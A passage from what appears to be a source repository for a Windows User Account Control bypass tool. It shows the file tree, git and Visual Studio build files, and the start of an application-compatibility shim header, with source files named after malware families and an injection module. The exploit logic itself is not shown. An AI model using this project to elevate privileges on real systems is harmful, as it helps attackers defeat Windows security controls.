├── .gitattributes
├── .gitignore
├── BypassUAC.sln
├── BypassUAC
    ├── BypassUAC.vcxproj
    ├── BypassUAC.vcxproj.filters
    ├── apphelp.h
    ├── carberp.c
    ├── carberp.h
    ├── cmdline.c
    ├── cmdline.h
    ├── compress.c
    ├── compress.h
    ├── consts.h
    ├── fubuki32.h
    ├── fubuki32comp.h
    ├── fubuki64.h
    ├── fubuki64comp.h
    ├── global.h
    ├── gootkit.c
    ├── gootkit.h
    ├── hibiki32.h
    ├── hibiki32comp.h
    ├── hibiki64.h
    ├── hibiki64comp.h
    ├── hybrids.c
    ├── hybrids.h
    ├── inazuma32.h
    ├── inject.c
    ├── inject.h
    ├── kongou32.h
    ├── kongou32comp.h
    ├── kongou64.h
    ├── kongou64comp.h
    ├── main.c
    ├── makecab.c
    ├── makecab.h
    ├── pitou.c
    ├── pitou.h
    ├── simda.c
    ├── simda.h
    ├── sup.c
    └── sup.h
├── README.md
└── Shared
    ├── _strcat.c
    ├── _strcmp.c
    ├── _strcmpi.c
    ├── _strcpy.c
    ├── _strend.c
    ├── _strlen.c
    ├── _strncmp.c
    ├── _strncmpi.c
    ├── _strncpy.c
    ├── minirtl.h
    ├── ntos.h
    ├── rtltypes.h
    ├── strtoul.c
    └── ultostr.c


/.gitattributes:
--------------------------------------------------------------------------------
 1 | ###############################################################################
 2 | # Set default behavior to automatically normalize line endings.
 3 | ###############################################################################
 4 | * text=auto
 5 | 
 6 | ###############################################################################
 7 | # Set default behavior for command prompt diff.
 8 | #
 9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs     diff=csharp
14 | 
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following 
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln       merge=binary
26 | #*.csproj    merge=binary
27 | #*.vbproj    merge=binary
28 | #*.vcxproj   merge=binary
29 | #*.vcproj    merge=binary
30 | #*.dbproj    merge=binary
31 | #*.fsproj    merge=binary
32 | #*.lsproj    merge=binary
33 | #*.wixproj   merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj   merge=binary
36 | #*.wwaproj   merge=binary
37 | 
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg   binary
44 | #*.png   binary
45 | #*.gif   binary
46 | 
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | # 
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the 
52 | # entries below.
53 | ###############################################################################
54 | #*.doc   diff=astextplain
55 | #*.DOC   diff=astextplain
56 | #*.docx  diff=astextplain
57 | #*.DOCX  diff=astextplain
58 | #*.dot   diff=astextplain
59 | #*.DOT   diff=astextplain
60 | #*.pdf   diff=astextplain
61 | #*.PDF   diff=astextplain
62 | #*.rtf   diff=astextplain
63 | #*.RTF   diff=astextplain
64 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | 
  4 | # User-specific files
  5 | *.suo
  6 | *.user
  7 | *.sln.docstates
  8 | 
  9 | # Build results
 10 | [Dd]ebug/
 11 | [Dd]ebugPublic/
 12 | [Rr]elease/
 13 | x64/
 14 | build/
 15 | bld/
 16 | [Bb]in/
 17 | [Oo]bj/
 18 | 
 19 | # Roslyn cache directories
 20 | *.ide/
 21 | 
 22 | # MSTest test Results
 23 | [Tt]est[Rr]esult*/
 24 | [Bb]uild[Ll]og.*
 25 | 
 26 | #NUNIT
 27 | *.VisualState.xml
 28 | TestResult.xml
 29 | 
 30 | # Build Results of an ATL Project
 31 | [Dd]ebugPS/
 32 | [Rr]eleasePS/
 33 | dlldata.c
 34 | 
 35 | *_i.c
 36 | *_p.c
 37 | *_i.h
 38 | *.ilk
 39 | *.meta
 40 | *.obj
 41 | *.pch
 42 | *.pdb
 43 | *.pgc
 44 | *.pgd
 45 | *.rsp
 46 | *.sbr
 47 | *.tlb
 48 | *.tli
 49 | *.tlh
 50 | *.tmp
 51 | *.tmp_proj
 52 | *.log
 53 | *.vspscc
 54 | *.vssscc
 55 | .builds
 56 | *.pidb
 57 | *.svclog
 58 | *.scc
 59 | 
 60 | # Chutzpah Test files
 61 | _Chutzpah*
 62 | 
 63 | # Visual C++ cache files
 64 | ipch/
 65 | *.aps
 66 | *.ncb
 67 | *.opensdf
 68 | *.sdf
 69 | *.cachefile
 70 | 
 71 | # Visual Studio profiler
 72 | *.psess
 73 | *.vsp
 74 | *.vspx
 75 | 
 76 | # TFS 2012 Local Workspace
 77 | $tf/
 78 | 
 79 | # Guidance Automation Toolkit
 80 | *.gpState
 81 | 
 82 | # ReSharper is a .NET coding add-in
 83 | _ReSharper*/
 84 | *.[Rr]e[Ss]harper
 85 | *.DotSettings.user
 86 | 
 87 | # JustCode is a .NET coding addin-in
 88 | .JustCode
 89 | 
 90 | # TeamCity is a build add-in
 91 | _TeamCity*
 92 | 
 93 | # DotCover is a Code Coverage Tool
 94 | *.dotCover
 95 | 
 96 | # NCrunch
 97 | _NCrunch_*
 98 | .*crunch*.local.xml
 99 | 
100 | # MightyMoose
101 | *.mm.*
102 | AutoTest.Net/
103 | 
104 | # Web workbench (sass)
105 | .sass-cache/
106 | 
107 | # Installshield output folder
108 | [Ee]xpress/
109 | 
110 | # DocProject is a documentation generator add-in
111 | DocProject/buildhelp/
112 | DocProject/Help/*.HxT
113 | DocProject/Help/*.HxC
114 | DocProject/Help/*.hhc
115 | DocProject/Help/*.hhk
116 | DocProject/Help/*.hhp
117 | DocProject/Help/Html2
118 | DocProject/Help/html
119 | 
120 | # Click-Once directory
121 | publish/
122 | 
123 | # Publish Web Output
124 | *.[Pp]ublish.xml
125 | *.azurePubxml
126 | ## TODO: Comment the next line if you want to checkin your
127 | ## web deploy settings but do note that will include unencrypted
128 | ## passwords
129 | #*.pubxml
130 | 
131 | # NuGet Packages Directory
132 | packages/*
133 | ## TODO: If the tool you use requires repositories.config
134 | ## uncomment the next line
135 | #!packages/repositories.config
136 | 
137 | # Enable "build/" folder in the NuGet Packages folder since
138 | # NuGet packages use it for MSBuild targets.
139 | # This line needs to be after the ignore of the build folder
140 | # (and the packages folder if the line above has been uncommented)
141 | !packages/build/
142 | 
143 | # Windows Azure Build Output
144 | csx/
145 | *.build.csdef
146 | 
147 | # Windows Store app package directory
148 | AppPackages/
149 | 
150 | # Others
151 | sql/
152 | *.Cache
153 | ClientBin/
154 | [Ss]tyle[Cc]op.*
155 | ~$*
156 | *~
157 | *.dbmdl
158 | *.dbproj.schemaview
159 | *.pfx
160 | *.publishsettings
161 | node_modules/
162 | 
163 | # RIA/Silverlight projects
164 | Generated_Code/
165 | 
166 | # Backup & report files from converting an old project file
167 | # to a newer Visual Studio version. Backup files are not needed,
168 | # because we have git ;-)
169 | _UpgradeReport_Files/
170 | Backup*/
171 | UpgradeLog*.XML
172 | UpgradeLog*.htm
173 | 
174 | # SQL Server files
175 | *.mdf
176 | *.ldf
177 | 
178 | # Business Intelligence projects
179 | *.rdl.data
180 | *.bim.layout
181 | *.bim_*.settings
182 | 
183 | # Microsoft Fakes
184 | FakesAssemblies/
185 | 
186 | # LightSwitch generated files
187 | GeneratedArtifacts/
188 | _Pvt_Extensions/
189 | ModelManifest.xml


--------------------------------------------------------------------------------
/BypassUAC.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2013
 4 | VisualStudioVersion = 12.0.40629.0
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BypassUAC", "BypassUAC\BypassUAC.vcxproj", "{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Win32 = Debug|Win32
11 | 		Debug|x64 = Debug|x64
12 | 		Release|Win32 = Release|Win32
13 | 		Release|x64 = Release|x64
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|Win32.ActiveCfg = Debug|Win32
17 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|Win32.Build.0 = Debug|Win32
18 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|x64.Build.0 = Debug|x64
20 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|Win32.ActiveCfg = Release|Win32
21 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|Win32.Build.0 = Release|Win32
22 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|x64.ActiveCfg = Release|x64
23 | 		{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|x64.Build.0 = Release|x64
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/BypassUAC/BypassUAC.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|x64">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Release|Win32">
 13 |       <Configuration>Release</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>BypassUAC</RootNamespace>
 25 |   </PropertyGroup>
 26 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 27 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 28 |     <ConfigurationType>Application</ConfigurationType>
 29 |     <UseDebugLibraries>true</UseDebugLibraries>
 30 |     <PlatformToolset>v120</PlatformToolset>
 31 |     <CharacterSet>Unicode</CharacterSet>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 34 |     <ConfigurationType>Application</ConfigurationType>
 35 |     <UseDebugLibraries>false</UseDebugLibraries>
 36 |     <PlatformToolset>v120</PlatformToolset>
 37 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 38 |     <CharacterSet>Unicode</CharacterSet>
 39 |   </PropertyGroup>
 40 |   <PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 41 |     <PlatformToolset>v120</PlatformToolset>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 44 |     <PlatformToolset>v120</PlatformToolset>
 45 |     <CharacterSet>Unicode</CharacterSet>
 46 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 47 |   </PropertyGroup>
 48 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 49 |   <ImportGroup Label="ExtensionSettings">
 50 |   </ImportGroup>
 51 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 52 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 53 |   </ImportGroup>
 54 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 55 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 56 |   </ImportGroup>
 57 |   <PropertyGroup Label="UserMacros" />
 58 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 59 |     <LinkIncremental>true</LinkIncremental>
 60 |   </PropertyGroup>
 61 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 62 |     <LinkIncremental>false</LinkIncremental>
 63 |     <OutDir>..\bin\$(Platform)\</OutDir>
 64 |     <TargetName>$(ProjectName)_x86</TargetName>
 65 |   </PropertyGroup>
 66 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 67 |     <LinkIncremental>false</LinkIncremental>
 68 |     <OutDir>..\bin\$(Platform)\</OutDir>
 69 |     <TargetName>$(ProjectName)_x64</TargetName>
 70 |   </PropertyGroup>
 71 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 72 |     <ClCompile>
 73 |       <PrecompiledHeader>
 74 |       </PrecompiledHeader>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <Optimization>Disabled</Optimization>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <SDLCheck>true</SDLCheck>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <PrecompiledHeader>
 89 |       </PrecompiledHeader>
 90 |       <Optimization>MaxSpeed</Optimization>
 91 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 92 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 93 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 94 |       <SDLCheck>true</SDLCheck>
 95 |       <DebugInformationFormat>None</DebugInformationFormat>
 96 |       <MultiProcessorCompilation>true</MultiProcessorCompilation>
 97 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
 98 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 99 |       <CompileAs>CompileAsC</CompileAs>
100 |     </ClCompile>
101 |     <Link>
102 |       <SubSystem>Windows</SubSystem>
103 |       <GenerateDebugInformation>false</GenerateDebugInformation>
104 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
105 |       <OptimizeReferences>true</OptimizeReferences>
106 |       <Version>6.0</Version>
107 |       <MinimumRequiredVersion>6.0</MinimumRequiredVersion>
108 |       <EntryPointSymbol>main</EntryPointSymbol>
109 |       <SetChecksum>true</SetChecksum>
110 |     </Link>
111 |   </ItemDefinitionGroup>
112 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
113 |     <ClCompile>
114 |       <MultiProcessorCompilation>true</MultiProcessorCompilation>
115 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
116 |       <WholeProgramOptimization>true</WholeProgramOptimization>
117 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
118 |       <FunctionLevelLinking>true</FunctionLevelLinking>
119 |       <CompileAs>CompileAsC</CompileAs>
120 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
121 |     </ClCompile>
122 |     <Link>
123 |       <Version>6.0</Version>
124 |       <GenerateDebugInformation>false</GenerateDebugInformation>
125 |       <SubSystem>Windows</SubSystem>
126 |       <MinimumRequiredVersion>6.0</MinimumRequiredVersion>
127 |       <OptimizeReferences>true</OptimizeReferences>
128 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
129 |       <EntryPointSymbol>main</EntryPointSymbol>
130 |       <SetChecksum>true</SetChecksum>
131 |     </Link>
132 |   </ItemDefinitionGroup>
133 |   <ItemGroup>
134 |     <ClCompile Include="..\Shared\strtoul.c" />
135 |     <ClCompile Include="..\Shared\ultostr.c" />
136 |     <ClCompile Include="..\Shared\_strcat.c" />
137 |     <ClCompile Include="..\Shared\_strcmp.c" />
138 |     <ClCompile Include="..\Shared\_strcmpi.c" />
139 |     <ClCompile Include="..\Shared\_strcpy.c" />
140 |     <ClCompile Include="..\Shared\_strend.c" />
141 |     <ClCompile Include="..\Shared\_strlen.c" />
142 |     <ClCompile Include="..\Shared\_strncmp.c" />
143 |     <ClCompile Include="..\Shared\_strncmpi.c" />
144 |     <ClCompile Include="..\Shared\_strncpy.c" />
145 |     <ClCompile Include="carberp.c" />
146 |     <ClCompile Include="cmdline.c" />
147 |     <ClCompile Include="compress.c" />
148 |     <ClCompile Include="gootkit.c" />
149 |     <ClCompile Include="hybrids.c" />
150 |     <ClCompile Include="inject.c" />
151 |     <ClCompile Include="main.c" />
152 |     <ClCompile Include="makecab.c" />
153 |     <ClCompile Include="pitou.c" />
154 |     <ClCompile Include="simda.c" />
155 |     <ClCompile Include="sup.c" />
156 |   </ItemGroup>
157 |   <ItemGroup>
158 |     <ClInclude Include="..\Shared\minirtl.h" />
159 |     <ClInclude Include="..\Shared\rtltypes.h" />
160 |     <ClInclude Include="apphelp.h" />
161 |     <ClInclude Include="carberp.h" />
162 |     <ClInclude Include="cmdline.h" />
163 |     <ClInclude Include="compress.h" />
164 |     <ClInclude Include="consts.h" />
165 |     <ClInclude Include="fubuki32comp.h" />
166 |     <ClInclude Include="fubuki64comp.h" />
167 |     <ClInclude Include="global.h" />
168 |     <ClInclude Include="gootkit.h" />
169 |     <ClInclude Include="hibiki32comp.h" />
170 |     <ClInclude Include="hibiki64comp.h" />
171 |     <ClInclude Include="hybrids.h" />
172 |     <ClInclude Include="inazuma32.h" />
173 |     <ClInclude Include="inject.h" />
174 |     <ClInclude Include="kongou32comp.h" />
175 |     <ClInclude Include="kongou64comp.h" />
176 |     <ClInclude Include="makecab.h" />
177 |     <ClInclude Include="pitou.h" />
178 |     <ClInclude Include="simda.h" />
179 |     <ClInclude Include="sup.h" />
180 |   </ItemGroup>
181 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
182 |   <ImportGroup Label="ExtensionTargets">
183 |   </ImportGroup>
184 | </Project>


--------------------------------------------------------------------------------
/BypassUAC/BypassUAC.vcxproj.filters:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup>
  4 |     <Filter Include="Source Files">
  5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
  6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
  7 |     </Filter>
  8 |     <Filter Include="Header Files">
  9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
 10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
 11 |     </Filter>
 12 |     <Filter Include="Resource Files">
 13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
 14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
 15 |     </Filter>
 16 |     <Filter Include="minirtl">
 17 |       <UniqueIdentifier>{a8fca0f2-f3d0-4a03-85ba-08c2ecacbff2}</UniqueIdentifier>
 18 |     </Filter>
 19 |     <Filter Include="Header Files\modules">
 20 |       <UniqueIdentifier>{81e84f63-ae69-465e-901c-d08d3b7e0f5e}</UniqueIdentifier>
 21 |     </Filter>
 22 |   </ItemGroup>
 23 |   <ItemGroup>
 24 |     <ClCompile Include="..\Shared\_strcat.c">
 25 |       <Filter>minirtl</Filter>
 26 |     </ClCompile>
 27 |     <ClCompile Include="..\Shared\_strcmp.c">
 28 |       <Filter>minirtl</Filter>
 29 |     </ClCompile>
 30 |     <ClCompile Include="..\Shared\_strcmpi.c">
 31 |       <Filter>minirtl</Filter>
 32 |     </ClCompile>
 33 |     <ClCompile Include="..\Shared\_strcpy.c">
 34 |       <Filter>minirtl</Filter>
 35 |     </ClCompile>
 36 |     <ClCompile Include="..\Shared\_strend.c">
 37 |       <Filter>minirtl</Filter>
 38 |     </ClCompile>
 39 |     <ClCompile Include="..\Shared\_strlen.c">
 40 |       <Filter>minirtl</Filter>
 41 |     </ClCompile>
 42 |     <ClCompile Include="..\Shared\_strncmp.c">
 43 |       <Filter>minirtl</Filter>
 44 |     </ClCompile>
 45 |     <ClCompile Include="..\Shared\_strncmpi.c">
 46 |       <Filter>minirtl</Filter>
 47 |     </ClCompile>
 48 |     <ClCompile Include="..\Shared\_strncpy.c">
 49 |       <Filter>minirtl</Filter>
 50 |     </ClCompile>
 51 |     <ClCompile Include="..\Shared\strtoul.c">
 52 |       <Filter>minirtl</Filter>
 53 |     </ClCompile>
 54 |     <ClCompile Include="..\Shared\ultostr.c">
 55 |       <Filter>minirtl</Filter>
 56 |     </ClCompile>
 57 |     <ClCompile Include="carberp.c">
 58 |       <Filter>Source Files</Filter>
 59 |     </ClCompile>
 60 |     <ClCompile Include="cmdline.c">
 61 |       <Filter>Source Files</Filter>
 62 |     </ClCompile>
 63 |     <ClCompile Include="compress.c">
 64 |       <Filter>Source Files</Filter>
 65 |     </ClCompile>
 66 |     <ClCompile Include="gootkit.c">
 67 |       <Filter>Source Files</Filter>
 68 |     </ClCompile>
 69 |     <ClCompile Include="hybrids.c">
 70 |       <Filter>Source Files</Filter>
 71 |     </ClCompile>
 72 |     <ClCompile Include="inject.c">
 73 |       <Filter>Source Files</Filter>
 74 |     </ClCompile>
 75 |     <ClCompile Include="main.c">
 76 |       <Filter>Source Files</Filter>
 77 |     </ClCompile>
 78 |     <ClCompile Include="makecab.c">
 79 |       <Filter>Source Files</Filter>
 80 |     </ClCompile>
 81 |     <ClCompile Include="pitou.c">
 82 |       <Filter>Source Files</Filter>
 83 |     </ClCompile>
 84 |     <ClCompile Include="simda.c">
 85 |       <Filter>Source Files</Filter>
 86 |     </ClCompile>
 87 |     <ClCompile Include="sup.c">
 88 |       <Filter>Source Files</Filter>
 89 |     </ClCompile>
 90 |   </ItemGroup>
 91 |   <ItemGroup>
 92 |     <ClInclude Include="fubuki32comp.h">
 93 |       <Filter>Header Files\modules</Filter>
 94 |     </ClInclude>
 95 |     <ClInclude Include="fubuki64comp.h">
 96 |       <Filter>Header Files\modules</Filter>
 97 |     </ClInclude>
 98 |     <ClInclude Include="hibiki32comp.h">
 99 |       <Filter>Header Files\modules</Filter>
100 |     </ClInclude>
101 |     <ClInclude Include="hibiki64comp.h">
102 |       <Filter>Header Files\modules</Filter>
103 |     </ClInclude>
104 |     <ClInclude Include="inazuma32.h">
105 |       <Filter>Header Files\modules</Filter>
106 |     </ClInclude>
107 |     <ClInclude Include="kongou32comp.h">
108 |       <Filter>Header Files\modules</Filter>
109 |     </ClInclude>
110 |     <ClInclude Include="kongou64comp.h">
111 |       <Filter>Header Files\modules</Filter>
112 |     </ClInclude>
113 |     <ClInclude Include="apphelp.h">
114 |       <Filter>Header Files</Filter>
115 |     </ClInclude>
116 |     <ClInclude Include="carberp.h">
117 |       <Filter>Header Files</Filter>
118 |     </ClInclude>
119 |     <ClInclude Include="cmdline.h">
120 |       <Filter>Header Files</Filter>
121 |     </ClInclude>
122 |     <ClInclude Include="compress.h">
123 |       <Filter>Header Files</Filter>
124 |     </ClInclude>
125 |     <ClInclude Include="global.h">
126 |       <Filter>Header Files</Filter>
127 |     </ClInclude>
128 |     <ClInclude Include="gootkit.h">
129 |       <Filter>Header Files</Filter>
130 |     </ClInclude>
131 |     <ClInclude Include="hybrids.h">
132 |       <Filter>Header Files</Filter>
133 |     </ClInclude>
134 |     <ClInclude Include="inject.h">
135 |       <Filter>Header Files</Filter>
136 |     </ClInclude>
137 |     <ClInclude Include="makecab.h">
138 |       <Filter>Header Files</Filter>
139 |     </ClInclude>
140 |     <ClInclude Include="pitou.h">
141 |       <Filter>Header Files</Filter>
142 |     </ClInclude>
143 |     <ClInclude Include="simda.h">
144 |       <Filter>Header Files</Filter>
145 |     </ClInclude>
146 |     <ClInclude Include="sup.h">
147 |       <Filter>Header Files</Filter>
148 |     </ClInclude>
149 |     <ClInclude Include="..\Shared\minirtl.h">
150 |       <Filter>Header Files</Filter>
151 |     </ClInclude>
152 |     <ClInclude Include="..\Shared\rtltypes.h">
153 |       <Filter>Header Files</Filter>
154 |     </ClInclude>
155 |     <ClInclude Include="consts.h">
156 |       <Filter>Header Files</Filter>
157 |     </ClInclude>
158 |   </ItemGroup>
159 | </Project>


--------------------------------------------------------------------------------
/BypassUAC/apphelp.h:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016, translated from Microsoft Documentation
  4 | *
  5 | *  TITLE:       APPHELP.H
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        12 Nov 2015
 10 | *
 11 | *  Application Compatibility Helper routines and definitions.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #pragma once
 20 | 
 21 | typedef DWORD TAGID;
 22 | typedef DWORD TAGREF;
 23 | typedef DWORD TAG;
 24 | typedef DWORD INDEXID;
 25 | typedef PVOID PDB;
 26 | typedef HANDLE HSDB;
 27 | 
 28 | #define TAGID_ROOT 0
 29 | #define TAGID_NULL 0
 30 | 
 31 | #define TAG_TYPE_NULL       0x1000
 32 | #define TAG_TYPE_BYTE       0x2000
 33 | #define TAG_TYPE_WORD       0x3000
 34 | #define TAG_TYPE_DWORD      0x4000
 35 | #define TAG_TYPE_QWORD      0x5000
 36 | #define TAG_TYPE_STRINGREF  0x6000
 37 | #define TAG_TYPE_LIST       0x7000
 38 | #define TAG_TYPE_STRING     0x8000
 39 | #define TAG_TYPE_BINARY     0x9000
 40 | 
 41 | #define TAG_PATCH_TAGID (0x5 | TAG_TYPE_DWORD) 
 42 | #define TAG_OS_PLATFORM (0x23 | TAG_TYPE_DWORD)  
 43 | 
 44 | #define TAG_PATCH_BITS (0x2 | TAG_TYPE_BINARY)
 45 | #define TAG_EXE_ID (0x4 | TAG_TYPE_BINARY)
 46 | #define TAG_DATABASE_ID (0x7 | TAG_TYPE_BINARY)  
 47 | 
 48 | #define TAG_DATABASE (0x1 | TAG_TYPE_LIST) 
 49 | #define TAG_LIBRARY (0x2 | TAG_TYPE_LIST) 
 50 | #define TAG_PATCH (0x5 | TAG_TYPE_LIST) 
 51 | #define TAG_EXE (0x7 | TAG_TYPE_LIST)
 52 | #define TAG_MATCHING_FILE (0x8 | TAG_TYPE_LIST)
 53 | #define TAG_SHIM_REF (0x9| TAG_TYPE_LIST)
 54 | #define TAG_PATCH_REF (0xA | TAG_TYPE_LIST)
 55 | 
 56 | #define TAG_NAME (0x1 | TAG_TYPE_STRINGREF) 
 57 | #define TAG_VENDOR (0x5 | TAG_TYPE_STRINGREF)
 58 | #define TAG_APP_NAME (0x6 | TAG_TYPE_STRINGREF)
 59 | #define TAG_COMMAND_LINE (0x8 | TAG_TYPE_STRINGREF)
 60 | #define TAG_COMPANY_NAME (0x9 | TAG_TYPE_STRINGREF)
 61 | #define TAG_INTERNAL_NAME (0x15 | TAG_TYPE_STRINGREF)
 62 | 
 63 | typedef enum _PATH_TYPE {
 64 | 	DOS_PATH,
 65 | 	NT_PATH
 66 | } PATH_TYPE;
 67 | 
 68 | #define PATCH_MATCH 0x4
 69 | #define PATCH_REPLACE 0x2
 70 | #define MAX_MODULE	32
 71 | 
 72 | typedef struct _PATCHBITS {
 73 | 	DWORD	Opcode;
 74 | 	DWORD	ActionSize;
 75 | 	DWORD	PatternSize;
 76 | 	DWORD	RVA;
 77 | 	DWORD	Reserved;
 78 | 	WCHAR	ModuleName[MAX_MODULE];
 79 | 	BYTE	Pattern[1];
 80 | } PATCHBITS, *PPATCHBITS;
 81 | 
 82 | typedef PDB(WINAPI *pfnSdbCreateDatabase)(
 83 | 	_In_  LPCWSTR pwszPath,
 84 | 	_In_  PATH_TYPE eType
